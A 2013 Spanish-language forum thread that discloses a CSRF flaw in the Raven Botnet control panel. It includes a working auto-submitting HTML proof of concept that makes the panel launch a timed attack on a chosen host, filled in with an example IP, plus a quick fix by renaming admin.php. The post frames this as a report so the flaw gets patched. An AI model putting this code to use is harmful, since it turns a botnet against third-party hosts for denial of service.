CSRF Raven Botnet

Iniciado por Metadato, Agosto 28, 2013, 01:55:33 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 28, 2013, 01:55:33 PM Ultima modificación: Agosto 29, 2013, 07:04:38 AM por Metadato
Bueno pues hola a todos, he encontrado varios CSRF en la Raven Botnet, uno de ellos está en la parte del ataque:

Código: html5

<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="URL DONDE SE ENCUENTRA LA BOTNET/admin.php" method="post">
<input type="hidden" name="target" value="HOST / IP QUE QUEREMOS ATACAR">
<input type="hidden" name="time" value="TIEMPO EN SEGUNDOS">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>


Tendrían que editar todo lo que está en mayúscula, les mostraré el mismo código con un ejemplo:

Código: html5

<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="http://ravenbotnet.com/admin.php" method="post">
<input type="hidden" name="target" value="173.194.34.248">
<input type="hidden" name="time" value="500">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>


Tambien podrían ocultar este script con un pequeño fake, pero como la intención de este post es que se fixeen los CSRF's, no se lo mostraré.
Bueno tambien voy a ser sincero, ¿cuantos de ustedes muestran la url donde esta su Raven Botnet? Creo que ninguno, quien lo haga no es muy recomendable, y más en este caso.

Bueno si quieren solucionar esto de forma rápida (aunque algo chapucera), puede cambiar el nombre de admin.php por otro nombre y en el index.php, en la línea 10:

Código: php

echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=admin.php">';


Le cambian el admin.php por el nombre que le pusieron y listo, también pueden montar la Raven de forma local. Espero que [Q]3rV[0] atienda este mensaje.

Un saludo  ;D

Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!


Agosto 29, 2013, 11:12:07 AM #2 Ultima modificación: Agosto 30, 2013, 10:32:44 AM por Metadato
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!

Gracias Pekador, un saludo compa.